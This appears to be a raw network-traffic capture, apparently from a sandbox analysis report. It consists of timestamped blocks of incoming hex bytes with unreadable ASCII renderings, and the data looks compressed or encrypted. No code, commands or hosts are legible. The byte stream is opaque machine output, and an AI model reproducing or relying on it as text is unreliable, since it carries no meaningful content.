                                                                                                                                                            2022-09-29 12:45:15 UTC19013INData Raw: 9f dd b4 15 26 39 c0 0b da 3c fc b9 04 e9 ea 2f 10 7a da 95 41 af 21 be a5 f4 f6 dd 83 0f c1 d3 f3 ac 44 70 22 bc 17 b2 bb 27 06 d1 52 78 81 90 d5 69 7d f0 d7 60 8a e6 0a 77 03 0b 21 f5 28 82 c1 20 5d dd 26 33 56 60 e9 7d a7 58 c8 62 50 38 77 fc 4b 5e c0 b1 cd c6 76 c0 7b b0 01 da ef 50 0f c5 1b a9 52 d0 a4 9c a3 19 8f 71 f1 29 c2 b5 36 6c b1 30 84 5a 1f d0 4f 89 e2 2a 44 5c 9c 06 9e 8e 86 3a 6f e7 c4 bb 80 b6 f2 86 0b 25 cc 92 41 01 c5 aa 89 8e 37 f8 a1 df 5e 0e d2 e7 2c a2 1a f7 f6 70 34 80 b1 b5 7b b3 a4 16 31 02 d3 6a 0b 44 ea 05 46 a1 a2 31 24 59 ed a8 48 2a be 15 93 c5 3d 41 50 18 1e 55 ba 16 95 bd c7 fa 05 a9 81 78 e5 4d 5a ac d0 0d 05 69 db db ed 07 1a 16 a1 55 0f 72 af 1a ae 43 aa 91 1c b9 32 b6 a1 a5 ce fd 09 e6 c7 a1 bc 7b 24 a8 72 ba 1f 51 80
                                                                                                                                                            Data Ascii: &9</zA!Dp"'Rxi}`w!( ]&3V`}XbP8wK^v{PRq)6l0ZO*D\:o%A7^,p4{1jDF1$YH*=APUxMZiUrC2{$rQ
                                                                                                                                                            2022-09-29 12:45:15 UTC19029INData Raw: ef 5f 21 2a 2c 77 b1 9f ca 55 d9 0e 92 13 28 3c 2c c7 0d 7b 12 42 81 7f 73 b1 c0 15 19 77 82 b4 72 76 47 11 67 3a ab b0 13 68 91 a2 51 38 2c fb c0 2d 4c d5 7f 90 b3 7b 90 72 6e 62 89 a1 0a 17 d2 8f 92 74 a8 e8 90 19 30 34 90 2c d5 7e d7 05 16 2c 93 6b 8e bb 86 ad ec ac 57 f7 00 9f fe ce 7b fb 7c 12 72 a4 bf cd f5 4a 2a 58 3a a8 05 37 e1 f0 72 ac 19 ce f7 13 76 84 ed e8 c3 f2 b3 9f d1 11 d1 74 ae be 39 f7 a2 3f d1 0f 6e 6f 21 2d de 51 09 48 30 4b c3 21 0d 60 ab 28 45 70 18 ec a8 a3 00 e9 e0 85 d1 c6 1f 10 d8 4e 4a a4 53 b0 97 97 41 4d 73 c3 5a 59 f2 ef a6 96 2c 19 18 fb e4 d4 fe 37 48 90 5a ce 94 3e 54 c1 71 9c bc 40 05 00 5c ef e1 41 99 0c 34 9a 90 c2 2a 51 8a 7a 10 9a 55 07 95 53 41 18 43 7a a5 cd aa 45 1e 38 75 0d fe b7 38 91 bb a4 e9 59 37 d1 5e ed 4c
                                                                                                                                                            Data Ascii: _!*,wU(<,{BswrvGg:hQ8,-L{rnbt04,~,kW{|rJ*X:7rvt9?no!-QH0K!`(EpNJSAMsZY,7HZ>Tq@\A4*QzUSACzE8u8Y7^L
                                                                                                                                                            2022-09-29 12:45:15 UTC19045INData Raw: 31 76 64 ef 9e 51 a5 fe 8d e3 6c ab 3e 7d d9 0f a5 3b f0 18 95 b3 05 00 81 98 35 df 4e e2 e6 76 db 80 3f d9 c9 a9 6b f8 d7 3e b4 5d b5 87 39 01 e0 48 b3 73 3a e6 17 a8 ce 6c ad 73 45 36 51 ec 5a 14 cb fc fb 64 a1 ea d2 e0 11 3e d1 97 57 94 ae 85 27 4b 52 10 96 25 51 49 d6 06 52 e8 c3 cf c7 04 2d 4b fa c5 56 5f 1e 2b 8f 2a 8f 35 0b 97 90 ff 0f c7 1c 40 27 7c 97 f9 de eb 36 64 88 ea 89 18 e7 55 5a 46 f7 8f f1 95 06 a8 66 e3 af 96 ae d4 a6 04 31 0a 3d d2 c4 8a b3 7d eb 2a 99 24 f9 cb 61 c6 30 48 8e 57 f4 e4 b9 25 bf d9 49 4f 6a 3f 1f f9 6e f9 d3 7d 29 14 62 ff 34 16 47 f8 c7 08 ec fe c5 74 29 4e 02 4b d5 e1 2b 7a 56 25 42 89 12 59 0c f9 03 54 0e 71 ca c2 0d 58 cf dc 37 26 6e e9 73 78 55 81 b6 5f 51 9a cb 5f b5 60 5a 2a df d3 b0 2e 51 77 e8 b0 f7 c6 c7 d2 0a
                                                                                                                                                            Data Ascii: 1vdQl>};5Nv?k>]9Hs:lsE6QZd>W'KR%QIR-KV_+*5@'|6dUZFf1=}*$a0HW%IOj?n})b4Gt)NK+zV%BYTqX7&nsxU_Q_`Z*.Qw
                                                                                                                                                            2022-09-29 12:45:15 UTC19061INData Raw: 79 68 4e ba 00 7b 43 f9 44 8f 54 46 93 6e 81 88 d3 63 03 ed 94 90 2c e9 ab 2a 89 77 0e 61 4e cf 97 0e 71 67 6b dc 8c ac ae 82 b6 b9 ea d0 ff 52 dd 5b db c8 af 0c 65 02 04 fa 80 86 d6 6c 2e 73 4d e3 15 ec 69 8d 8c ee 5d 1c ac a1 40 03 49 06 ad 48 ec 3a 13 6f 43 8f 27 e9 2a f5 14 09 6d f9 72 bb eb f8 31 26 ab ef ec d6 1f 67 4f f3 7c e2 bb 82 f0 9b da 30 f1 0d 55 95 6e b3 e4 d1 2b 7c 92 71 aa e2 3f ae f0 f7 18 50 bd 3d 94 1a 7e 63 db 41 c9 ef a9 d8 f6 fb 02 3f b9 c2 c6 93 89 89 e7 9a 62 f2 c8 99 06 bf 3f b5 8e 37 50 43 3d 4e d0 1d b2 dd 7c 7e 4b db bb db f6 13 20 31 c8 12 19 96 70 eb 4f e5 7a 1c 22 c2 4d 1b a1 1f 8d 16 81 11 24 40 73 bc 61 66 67 6d dc 70 b6 a5 51 67 24 ea 0c 3d 66 ad 7a c8 a2 b4 6f e7 1c 2c 22 64 c7 1a c1 0d 5f 6c 90 f3 c6 d4 56 c3 12 78 73
                                                                                                                                                            Data Ascii: yhN{CDTFnc,*waNqgkR[el.sMi]@IH:oC'*mr1&gO|0Un+|q?P=~cA?b?7PC=N|~K 1pOz"M$@safgmpQg$=fzo,"d_lVxs
                                                                                                                                                            2022-09-29 12:45:15 UTC19077INData Raw: 2e f4 20 3d 30 c9 14 04 78 27 96 3b 35 8a 9b 81 a1 e5 ef 6e 6d 95 02 96 a2 6d 3b 53 0c d5 cd 2a 1d 5e 95 2f 6b 80 fb ab ee 41 20 4e 3d ef 7a 5c 4f a9 5a 65 aa e8 bf 06 34 08 f3 39 00 f3 73 b2 b9 d7 66 03 39 35 44 3c 77 a1 ba d4 f8 c1 a3 2b 5b fe 34 b0 ca bf 48 e4 3e 25 39 f9 ec 33 eb a3 5e 9d 9f fe fa a1 b4 3c 13 e8 92 15 dd 52 35 fd 3f 34 fd c4 f7 65 f1 1b f9 c7 00 4b 36 4b 67 6a 82 cc f4 4f f9 41 8b c8 d9 eb 5f 2f de 60 64 b7 c6 6c b2 7a 17 6d b0 df d3 02 43 c6 f6 74 95 56 5a 19 80 6f bc 53 b4 4e 30 fb 88 20 33 64 6a dd b0 55 8e 1f 49 09 a7 2f 10 b0 20 41 f7 5d f7 76 f1 e6 07 da 92 d0 69 3a 2a 1d 9c 6a e8 e4 c8 93 b1 5b 8d 27 70 06 8a 9e 4f 4c 6b a1 d1 a9 9e 9b 50 ef 23 61 dc ab 8f cd 22 53 67 7d 54 0e 4e 3e ce d1 af 46 e8 9b 18 b9 5c a1 15 81 40 5c fe
                                                                                                                                                            Data Ascii: . =0x';5nmm;S*^/kA N=z\OZe49sf95D<w+[4H>%93^<R5?4eK6KgjOA_/`dlzmCtVZoSN0 3djUI/ A]vi:*j['pOLkP#a"Sg}TN>F\@\
                                                                                                                                                            2022-09-29 12:45:15 UTC19093INData Raw: 87 9f 18 33 94 7e 8c ec 02 06 43 af e1 52 17 4f d6 0d 48 fc ff e6 4d ad b0 c8 fb 7e 70 20 81 fc 1d 42 d8 49 90 b8 01 7a 9c 3c 27 c5 d1 76 51 4e 34 61 f6 e2 10 39 e1 ba 7f 4e eb 9a 76 3a f8 60 b2 cb b5 f2 1f e4 d6 a9 7c 39 58 f1 6b 6f 03 d1 f4 8b e5 b0 fe 22 1b 6a 05 3c b9 a8 8e de a1 9b 10 88 3c 60 bd 62 3c 10 b5 5d fc 5e 7c da dd ec 29 1e 42 16 58 dd 5f a5 cc 15 8a b4 aa c4 23 a9 c2 2c 9d 44 83 87 8e 25 13 3d e8 6f 66 48 f7 e8 8b 6a 96 1b a7 aa 3e 1b 91 b7 bf 89 8b 93 a5 36 bd db 5e 4b 66 2d 91 df e0 60 67 c0 78 82 a8 03 79 0b 27 28 f6 0d f0 fc c0 c1 0d 8a 81 d4 24 23 bd 21 48 dd ba 65 be 72 36 c2 78 a9 99 be 36 a9 3a b0 cb c1 3b ba ab 25 a3 a4 34 70 e3 80 cf 78 a9 44 6b 9b 56 14 66 bb 12 17 f4 59 9c 08 eb 2e fa b5 c4 78 62 f8 7d a3 65 10 40 de 4a 84 d4
                                                                                                                                                            Data Ascii: 3~CROHM~p BIz<'vQN4a9Nv:`|9Xko"j<<`b<]^|)BX_#,D%=ofHj>6^Kf-`gxy'($#!Her6x6:;%4pxDkVfY.xb}e@J
                                                                                                                                                            2022-09-29 12:45:15 UTC19109INData Raw: 01 4b 3f 9c d2 8a ec 71 f1 db b8 6c 08 23 64 4e 9d 01 28 60 4f 5e 62 db 1f f4 cb 65 9f d9 e5 83 5c 5d fd 23 3d d4 50 98 3d 4b a2 75 f1 52 6b 50 2e 04 a8 9f 45 55 2a 8c 4b 69 21 e8 0a ce 5b c9 40 0e 30 ec 02 56 9d 59 72 a1 28 05 f0 2e da d5 11 97 f8 56 f7 78 2c 16 c1 35 3a e5 80 31 70 98 1d 64 3c 33 bd 82 09 1b df 7d 9f f6 96 67 7d 71 2d 8b 55 71 8b a3 01 96 e2 09 31 fa d2 e5 53 19 88 49 6a f2 58 62 b4 67 c5 58 52 8c fc 83 83 7e 54 39 17 03 7b a5 ed f1 15 1c 15 9b cf 4a 62 6b 0f ab 1a ec 17 0a bf e6 df 78 71 66 3c 00 7c de 4c 7f 5f e0 03 91 b7 d7 c6 85 cf 64 0d 29 25 64 30 03 84 b7 45 d2 0f 1b 72 42 67 3c a8 31 03 c8 a3 4d 88 55 23 6a f1 e2 8a 3d 5e 42 c7 a4 c8 bf e8 3f 70 5a 40 02 2e 92 3f 1e 7e ea 0b 4c 38 44 79 b5 54 47 21 f5 54 d3 cc 89 b8 3d ba e0 a8
                                                                                                                                                            Data Ascii: K?ql#dN(`O^be\]#=P=KuRkP.EU*Ki![@0VYr(.Vx,5:1pd<3}g}q-Uq1SIjXbgXR~T9{Jbkxqf<|L_d)%d0ErBg<1MU#j=^B?pZ@.?~L8DyTG!T=
                                                                                                                                                            2022-09-29 12:45:15 UTC19125INData Raw: b9 4c bc 2e af 2c b7 0a dd b1 46 b5 96 9d 39 f6 bd b9 79 59 59 91 43 de a3 c1 ac 2e e1 db ee 16 d3 7d 97 c2 da f5 8d df 5c 08 53 0c c2 dc ee 78 1c 6c 81 34 5a 57 6a 08 83 12 4b eb 04 ea 30 8f fc 8e 2c 1c fc 36 e5 0c 45 63 85 a6 97 f0 3f 93 00 30 3f ce 0c 47 55 00 ee 2c 14 d8 91 d6 2b 15 ad d7 ec b9 71 5f 9a 95 97 c6 02 3d a0 f0 f6 ce 89 82 cd b1 61 9a 62 d1 38 d6 f9 6f 47 a8 72 d3 09 33 2e f1 c6 92 a3 25 d6 6f ae 45 f9 54 fe 81 a8 05 f9 2a 9a a9 06 0c 98 fb 72 37 4c b6 df b2 31 e9 e9 55 31 27 03 ae 07 74 8e 2d e6 8e a2 ce 62 93 3f de dd d6 cf 7d 4f cf 0d 32 69 58 14 45 5a 06 e5 61 f0 3a ce 73 61 82 cb 4a b8 d6 f4 8b a0 28 0e 3a 46 16 db a4 0a b0 c1 7c 00 8d 87 65 07 98 16 87 35 89 1a db fc 1f f4 f1 fb fb ba cc 96 74 29 38 32 3f da 64 2a 93 d2 f6 89 d8 06
                                                                                                                                                            Data Ascii: L.,F9yYYC.}\Sxl4ZWjK0,6Ec?0?GU,+q_=ab8oGr3.%oET*r7L1U1't-b?}O2iXEZa:saJ(:F|e5t)82?d*
                                                                                                                                                            2022-09-29 12:45:15 UTC19141INData Raw: 7d e9 d7 e9 55 4c dc 0a 6f 73 c7 20 4a 60 c1 3b 77 7a 15 e1 af 65 a4 5b 8b dd 82 a7 4a 98 bb 05 db ac 70 f4 c6 fd 5e fc ab 10 e3 59 6d 7f 3c d0 8a 2e 61 2b c2 ea 57 56 19 aa 6e 90 62 2a b0 83 8b d4 bf c5 fa 7c 46 5a ea 97 f6 b1 59 c2 23 55 8f 1d 56 e9 52 1f 31 bb 1f ea 20 a5 f4 aa d4 37 ad cf c8 00 2f a9 64 76 cf 9c 97 3a 8f 81 86 d0 42 5e 7c 72 e1 7c 40 f5 fb de c4 48 8a 97 35 45 78 8a d3 b0 6a 30 47 71 15 cb dd 8f 8d ce aa 2a 85 be 49 4e 4d 76 62 c2 9a f7 e6 1e 96 06 d3 b2 7e df e0 d6 ab c3 ff 3f 2a cb 85 5f 52 00 61 ae 04 51 05 2c 23 ee 81 4f 1e 29 ed 00 b1 cc dd 53 70 a0 cd 0b 54 15 ae cb 30 a1 2d e8 af 4e 1d 5f a3 a9 64 49 10 45 3b 87 0c a7 c7 92 4f 5d 32 88 5f 42 15 8a fc 53 87 12 88 89 f2 dc c9 b3 e2 57 da 1c 0d 18 23 f3 81 ec 0a 57 49 b5 ee 9a a2
                                                                                                                                                            Data Ascii: }ULos J`;wze[Jp^Ym<.a+WVnb*|FZY#UVR1 7/dv:B^|r|@H5Exj0Gq*INMvb~?*_RaQ,#O)SpT0-N_dIE;O]2_BSW#WI
                                                                                                                                                            2022-09-29 12:45:15 UTC19157INData Raw: 2e 99 99 72 9e ba ea ce b7 06 87 fc 66 4d f9 25 d1 88 48 6b 2e 6c 2a 40 dd 8a ea e3 74 69 23 e1 9c a9 cd 92 75 8f 3d 73 53 ba a5 f1 59 79 95 ae 5a 6b 8b 83 86 4e 97 3a d4 5b d0 42 2a 67 ba 58 da 2f 8d dc d1 fd f4 0a e0 44 24 62 7e e5 4c d0 71 74 ae 01 65 0e b0 c6 8d a8 57 04 c1 ce c8 ad 49 70 51 b6 a3 d0 79 0e c5 2d bf b9 c3 c1 02 07 3f 67 97 12 27 cf 96 4a 48 0f a8 0a 59 5e 2c a2 7f 76 9d 82 f2 3e 1a 2d b1 13 0a d4 48 f4 40 6b 02 b7 85 5f c3 5a 46 ff db 9f bb 11 bc 5d e8 9e 75 8e fb ac 82 0e fd 6e 61 cf 2c fa 83 97 7e f5 93 0b b3 fa 82 bb c8 d3 18 ae 7a 05 09 73 fc 4e 73 e4 58 df b1 ae 64 6b 72 25 82 b4 e7 f0 46 a4 2d 41 cf cf 69 8c 5e f1 b7 a6 9e a2 4a 4a 8f 32 82 c5 4a e8 62 a5 d2 67 aa 6a 55 98 38 f3 41 e4 be 88 63 44 7d 17 a0 b2 b6 78 3c 8c 63 59 e9
                                                                                                                                                            Data Ascii: .rfM%Hk.l*@ti#u=sSYyZkN:[B*gX/D$b~LqteWIpQy-?g'JHY^,v>-H@k_ZF]una,~zsNsXdkr%F-Ai^JJ2JbgjU8AcD}x<cY
                                                                                                                                                            2022-09-29 12:45:15 UTC19173INData Raw: 40 5e a4 e8 50 84 fb ba 15 aa 81 b8 16 a4 ec f4 83 2a 6f e3 01 2f 84 1f 63 19 cf 2d bb b0 22 0d b8 ae 66 d4 87 44 b1 ee fb 08 7c a9 73 69 e9 a4 50 a8 24 99 5b d3 5b bf 47 90 06 bf 4e 21 d2 bc 58 c5 1a ef 7a cc 8b 52 5c a8 c4 88 18 2a 62 5c ca b7 e8 aa 39 db fd ee 73 15 15 14 c7 05 a4 99 37 12 dd e8 04 38 0b 41 a4 53 ee b6 85 be 01 01 72 cd a5 2d 13 e9 08 96 e0 b8 01 99 58 c7 c0 b9 8f da 96 03 81 91 7a d7 a8 c0 e4 2e 00 91 28 6c 9e 33 77 44 bb dc 2a 7c ee 0e b6 ce 90 24 3b dc 60 88 29 7a bc ac ef e4 86 c7 7e cc 79 91 f3 60 eb fd e6 6b b8 cb e4 b6 0c 37 2c 7b c2 b4 9b 92 eb b7 d8 bf 47 ba c2 c1 7e ee 88 f9 86 e6 b6 94 6c 4f 66 6e 2e 2a 69 83 2b b1 aa a4 0c 51 2a e3 1d 85 6c 10 27 3a f4 2a ba 2b 65 37 a2 33 09 21 c8 38 ea d9 9a 13 9b fa b2 74 b3 0c 8d 23 e3
                                                                                                                                                            Data Ascii: @^P*o/c-"fD|siP$[[GN!XzR\*b\9s78ASr-Xz.(l3wD*|$;`)z~y`k7,{G~lOfn.*i+Q*l':*+e73!8t#
                                                                                                                                                            2022-09-29 12:45:15 UTC19189INData Raw: cc 35 51 6c 47 73 d6 ce a1 72 8c 1b 91 4e 9a cc 8b e2 09 28 84 ba 95 b3 c6 58 0c b0 90 ce 77 93 7e 10 05 d7 5a 9f 9a 2a 94 58 e7 63 70 31 e4 05 d9 65 f4 8a 2d d4 d9 2c f1 b8 b7 d8 f7 02 a8 13 e3 28 dc 5d e7 26 b8 72 7f a9 ee 51 76 b3 a7 a1 d2 a6 9c ad 96 73 c3 05 d9 89 58 68 5b f8 5f 9f f3 16 9e 4a bd d9 23 86 fc cb 75 14 bc 89 15 9a 56 9a d6 e3 db e7 6c d6 b4 cd 0d bd 27 6b c1 42 ef fa e6 50 0b e6 af d3 34 1b 82 05 e7 c6 d0 e6 ef ac 1d 94 85 d5 8e d7 2a c8 eb 7a d0 f3 b7 a0 60 32 d8 da 5d d6 a5 41 c4 24 46 8b f0 48 95 7d 40 ba d3 41 e0 dd 31 6c 2c a3 16 1d 17 0c c3 12 ab ba 70 63 d3 7a 39 6f d9 ae 71 02 8d d5 bd ce 1c 87 4a 65 b3 28 d2 00 8c 95 28 11 49 88 01 89 d6 3e af f2 e4 29 ae 5f 3a 48 dd cb 2e 62 bd 8b a1 6b 43 34 19 e1 ec 7e 37 22 50 b5 a0 c8 b7
                                                                                                                                                            Data Ascii: 5QlGsrN(Xw~Z*Xcp1e-,(]&rQvsXh[_J#uVl'kBP4*z`2]A$FH}@A1l,pcz9oqJe((I>)_:H.bkC4~7"P
                                                                                                                                                            2022-09-29 12:45:15 UTC19205INData Raw: 74 a5 48 39 58 b3 44 4c 0d 43 f3 89 a0 0b b7 75 47 db dc e0 bf 29 1c 51 bd 55 f9 e9 18 bf 1c bb 33 36 0a 93 76 74 84 b2 c9 4c 13 93 23 4f b0 17 91 53 bc e0 6f cf ca 8b b3 2b 3c 54 97 47 0b 2b 72 73 88 46 eb 96 63 e0 d8 6f 50 cb a1 bb 07 f2 6e 91 ac 9e d0 c6 8a a7 ba 71 d2 09 cc 77 97 b3 1a 8e 2f 26 52 73 fe 34 a7 e6 0d 34 4a 67 bd 35 88 14 db da 40 69 65 1c ac 84 0f 7f 48 9c e0 30 a8 8a c0 3d 5b c0 44 72 d6 92 a5 a0 2c 98 ec be a7 89 85 d9 c9 8d fd ab ae d1 b1 e3 c0 ae b8 23 69 db a0 82 37 78 60 40 98 03 a2 78 03 0d 7f 2d 45 62 a7 77 f0 19 1d 00 66 a0 23 53 48 c3 53 bd 7e 69 5b 9d 58 ea 21 bb 92 61 98 21 de c1 a9 5d db 41 ca 70 75 21 c9 78 55 ee 7c fd ab 69 bf 7b c6 2a d8 78 51 9b dc 6a ec 26 bf 54 cd 6e 75 dd e3 04 83 05 45 5e 59 01 0f 79 d2 d5 a0 4f a3
                                                                                                                                                            Data Ascii: tH9XDLCuG)QU36vtL#OSo+<TG+rsFcoPnqw/&Rs44Jg5@ieH0=[Dr,#i7x`@x-Ebwf#SHS~i[X!a!]Apu!xU|i{*xQj&TnuE^YyO
                                                                                                                                                            2022-09-29 12:45:15 UTC19221INData Raw: b0 c9 4b 52 dd 4f c2 04 16 35 15 5a 7d 64 5b 71 ba 44 a5 37 3e 9f 86 7f e2 7b 82 f0 14 9a 09 6b b2 03 de 45 99 ca ee 2a 23 95 09 aa 0f 09 a8 ba 47 1d db a4 57 8d fb 3f da 90 61 5b 45 46 17 36 40 b7 3e 16 cc 5e cb d5 87 e8 3d a0 1a d9 84 83 85 81 7c 1b 50 c9 8d 59 9d 5e 54 d3 e6 35 b1 69 16 1b 6f 5e f7 a9 33 13 3b 09 22 e2 9f 6e 39 79 16 ca 3e 44 b7 fd 88 16 42 0b 32 78 af 96 11 83 ea 6f 09 a4 fd 66 64 ac fe 96 e5 0b d7 48 7f 59 99 5d 73 86 2b a6 91 8f 23 3e 87 3d d2 46 a8 df 70 04 f6 83 2e 83 af 6b 4e 89 22 12 89 c6 43 82 90 6e c6 e5 9a 1e 78 d7 a8 32 f4 15 e0 77 f6 f9 a1 ed df 86 bf 61 11 90 c0 19 e4 dd 57 73 a6 95 f8 19 0f 6a d4 da 4c 30 be d6 5b 96 1f 1e 19 ea e3 da b9 80 30 b8 ac 07 c1 9a f4 ee e6 4f e8 3d 0e bd aa 42 1d 9b ed f1 7c b7 a3 c3 4d 74 8e
                                                                                                                                                            Data Ascii: KRO5Z}d[qD7>{kE*#GW?a[EF6@>^=|PY^T5io^3;"n9y>DB2xofdHY]s+#>=Fp.kN"Cnx2waWsjL0[0O=B|Mt
                                                                                                                                                            2022-09-29 12:45:15 UTC19237INData Raw: 9f 09 c7 3f 01 50 fc d8 5d 36 e1 bb 1d fb 3b 6f c8 70 bb c2 6c 21 36 52 40 21 ac 5b 7b 58 92 fe 4b 76 ee c1 ae 0d 06 80 2c ef ed 74 87 a2 f7 e2 8d 23 65 e3 e9 ae dd 05 7f a8 11 b6 6e e6 4e f5 b6 a0 84 67 d2 b1 b1 a4 78 26 b7 ad c3 e2 85 9b 84 7e 93 bf fe 85 6d e3 d7 0a af 5c 45 59 2b 15 24 e7 f3 f2 74 ad 17 d6 cb 05 24 1e 1a 97 07 f2 f5 0c b5 1e 87 fa 94 06 c1 96 cb e1 c9 45 5c c7 ca 90 79 a4 a5 d8 12 b6 0a 94 ec 8b a4 94 c5 b8 b8 4e ca a0 75 f1 96 4c 57 88 4c 9a 36 8f 5f 76 38 1e 0e bf ba 09 ba 93 89 13 bb 9c 0d b2 6d 56 f6 a7 be 47 ce 7a 7a f3 af ee 2d 25 3e d6 74 7e 54 ec 62 d4 6d 19 21 31 26 c2 14 c4 58 a9 02 9c 38 e6 7d 81 36 c5 82 69 d1 74 05 de fc 97 4c 90 28 22 3e 67 ba f6 f5 2f 83 74 73 2a 5e a5 5a fd d8 d8 62 d5 95 fa e2 8b 4a 3d 49 f4 da 17 c7
                                                                                                                                                            Data Ascii: ?P]6;opl!6R@![{XKv,t#enNgx&~m\EY+$t$E\yNuLWL6_v8mVGzz-%>t~Tbm!1&X8}6itL(">g/ts*^ZbJ=I
                                                                                                                                                            2022-09-29 12:45:15 UTC19253INData Raw: 46 2c 7e 4a 3a e1 42 32 ca cb 09 ab 22 9a 03 b6 75 ec 58 80 c6 34 dd 16 e1 4c bc f3 b8 9b 50 c7 07 88 29 60 1e 22 cb 92 29 37 f7 7e 90 79 2b 26 b1 96 a5 40 5b 29 72 3e 7e 02 62 48 8b 8d 5d 96 0f 08 f1 38 cb cd c0 4b f4 b3 a5 d5 be 97 65 50 bd 61 e7 bd 0b 8e 70 15 a7 a7 12 fd 71 24 fa f4 4b a8 e1 e2 cc 72 3c 84 b4 7d cb ad 9e 03 c3 dd 17 13 8b 79 d8 d4 44 77 f9 3a 12 9c 3d 3a f3 80 77 76 f7 a5 b7 30 7c f5 69 bf 93 d8 a4 c2 eb 58 12 5b a0 a9 c5 c0 1d 1e c9 ba de 59 32 22 42 7c 42 ae 70 78 49 f7 81 64 da 78 13 74 30 0e ae 8e 21 ab 6a 81 fb 2b ba 0b 90 97 d0 8d bc b9 1d 9b 34 80 8c e0 76 e2 37 9c 3d 4c 4d 66 1d 16 bd 0b ff 20 a3 e6 5a 03 3a 27 44 23 29 58 cd 2c e8 c6 f6 76 de 30 2d 63 f7 a3 cb ad fb ab 52 f7 77 9d f6 cf 51 44 29 ce 07 6f a8 de 1b fd 70 7b 4b
                                                                                                                                                            Data Ascii: F,~J:B2"uX4LP)`")7~y+&@[)r>~bH]8KePapq$Kr<}yDw:=:wv0|iX[Y2"B|BpxIdxt0!j+4v7=LMf Z:'D#)X,v0-cRwQD)op{K
                                                                                                                                                            2022-09-29 12:45:15 UTC19269INData Raw: bc 47 28 92 89 dc b2 b1 3f 89 c9 6c b7 c6 d1 c3 78 62 f8 f3 53 fd 52 c4 c2 60 6c 86 63 c7 fe b1 85 b7 93 ac 80 52 7e 5c 40 b2 61 36 fa 32 86 da 9f f5 a8 5a a9 3c 15 bc 23 dd dc 2d ee 94 07 4a 91 11 50 45 0b a5 eb de 0b 5a 9d da 8e 69 a6 4d 84 19 d8 50 61 fd 5e 89 40 16 b0 66 82 8f fe b7 de b5 74 c9 c0 1a e0 6e 67 f6 60 31 8c 9b 74 a2 8e d7 ed 10 9b 4b 43 07 75 2e f9 50 e3 aa 4d 29 93 8c 4d f2 d8 00 7a 53 32 c4 ba 20 b1 a4 b4 79 71 d2 d0 c0 66 57 af 21 20 df 20 0d 47 3b 7e fe 01 c8 54 e5 c5 c2 db c8 15 9c e6 65 36 6f d4 42 1c cc ba c1 b2 b1 ab 98 e4 05 33 9d 48 68 6c e1 f6 0c 0c 6b 50 2b 00 f7 da ef 56 f5 98 0e 8e 79 1a 54 b5 32 73 ad d7 49 20 5c b1 7b 5b 25 1c fb 4a c9 93 3d 29 f7 65 fa 7c fc b9 0a 74 d1 15 42 6f 54 cf 0e 7d f9 aa 2c 34 da c5 63 b6 38 2e
                                                                                                                                                            Data Ascii: G(?lxbSR`lcR~\@a62Z<#-JPEZiMPa^@ftng`1tKCu.PM)MzS2 yqfW! G;~Te6oB3HhlkP+VyT2sI \{[%J=)e|tBoT},4c8.
                                                                                                                                                            2022-09-29 12:45:15 UTC19285INData Raw: c5 57 dc 40 0f f2 09 43 b1 3d d7 9e de 8c a9 31 60 eb 25 4e 7d fe 24 32 fa 68 d6 67 58 75 ab 33 3e 6c 2c 28 cf 13 aa ae a1 1e ae 33 b8 a5 a0 d9 9e a6 90 d1 90 80 9c 51 f2 4c 7b 1b 3f 44 5c 01 b9 83 ea ad 2d c0 65 73 71 88 fd 55 5c 14 8f b5 81 06 f8 a0 2e b3 1f 17 9a e9 4e 08 84 32 5a 90 67 23 a9 72 0e 4c 81 82 1e da 67 7c a4 8b c1 a5 de b2 e5 93 49 06 9a 1a 33 83 3c 0e 05 ec fd e1 ca 94 21 fd ca 89 22 8d 79 27 f4 f2 e7 54 05 9a ac 17 5a 4c 58 55 68 3a 4f 10 78 61 30 38 22 e3 34 14 82 00 e1 9f b7 9f 27 1a 45 4e 20 09 56 0c b4 76 7e ea 60 ea 11 84 1c be 7d 37 df c9 bd 84 f4 24 67 61 cb dc b8 40 3d fe 23 21 5f 97 5d 39 f0 bb 4c 76 28 02 7b d3 dc de 41 b9 06 4d 19 6d 51 fb 1e 9f d8 ee a3 21 b6 f5 78 2f f2 05 aa 7d 94 6a c3 3d e0 2d a6 9e 99 ef 19 bc 78 c3 b5
                                                                                                                                                            Data Ascii: W@C=1`%N}$2hgXu3>l,(3QL{?D\-esqU\.N2Zg#rLg|I3<!"y'TZLXUh:Oxa08"4'EN Vv~`}7$ga@=#!_]9Lv({AMmQ!x/}j=-x
                                                                                                                                                            2022-09-29 12:45:15 UTC19301INData Raw: cd 1c 4d 1f 17 6e cf 05 11 4b c2 d6 3f f0 2b f1 24 f2 38 c6 86 af f3 5a ed f9 dc c2 b6 b0 4a 49 af 32 d7 63 6f 98 99 66 20 4e e5 d0 00 10 6e 1d af 06 8a ff d8 58 97 24 32 c9 48 43 19 a2 50 dd 1b 06 2e 9f b0 ed fe b8 94 63 8a 76 69 0c 30 e3 55 55 b8 c7 9a 80 a9 c9 4c 96 dc 27 d2 60 b4 6f 3a e6 e1 c3 6d cb 1c 6d 98 6b a2 4a d8 52 48 90 68 c1 91 0e 73 d4 16 92 eb 88 78 27 a8 8e e4 f5 6c b3 53 3a e9 bc 91 80 40 52 36 c3 4e 50 2a c5 45 72 6e a1 6c a6 61 62 92 74 81 68 21 66 74 9b 1e af a4 2a 87 ac 4b 08 d3 98 04 a4 71 65 4f 86 69 85 96 af 59 3e 9d d0 74 a3 8a bb 1e 4e 5a 4a 26 9e 91 67 eb e1 8f 50 83 5f 1c c3 d6 d2 f1 5b 82 dd 23 b6 46 65 7c f5 87 b8 22 b5 0b 7c 2c d9 56 0f de 9a 30 2e cf 0a 01 c3 63 cb ce 2b ec 11 73 91 16 33 b7 99 7a c6 f1 53 54 45 46 06 4f
                                                                                                                                                            Data Ascii: MnK?+$8ZJI2cof NnX$2HCP.cvi0UUL'`o:mmkJRHhsx'lS:@R6NP*Ernlabth!ft*KqeOiY>tNZJ&gP_[#Fe|"|,V0.c+s3zSTEFO
